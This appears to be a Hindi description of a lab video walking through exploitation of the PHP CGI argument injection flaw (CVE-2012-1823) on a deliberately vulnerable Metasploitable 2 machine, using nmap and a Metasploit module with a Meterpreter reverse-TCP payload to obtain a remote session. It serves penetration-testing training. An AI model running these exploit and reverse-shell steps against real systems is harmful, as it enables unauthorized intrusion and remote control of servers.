
इस वीडियो में Kali Linux के माध्यम से Metasploitable 2 सर्वर पर PHP CGI Argument Injection (CVE-2012-1823) का शोषण Metasploit का उपयोग करके किया जाता है।
Kali से Metasploitable IP पता करें:
ip a
उदाहरण के लिए:
Kali: 192.168.56.101
Metasploitable2: 192.168.56.102
पोर्ट और सेवा की जाँच करें:
nmap -p 80 192.168.56.102
ब्राउज़र में भी जाँचा जा सकता है:
msfconsole
search php cgi
सही मॉड्यूल:
use exploit/multi/http/php_cgi_arg_injection
set RHOSTS 192.168.56.102
set RPORT 80
set TARGETURI /
पेलोड चुनें:
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.56.101
set LPORT 4444
जांच कर लें:
show options
run
या
exploit
यदि सफल होता है:
Meterpreter session 1 opened
sysinfo
whoami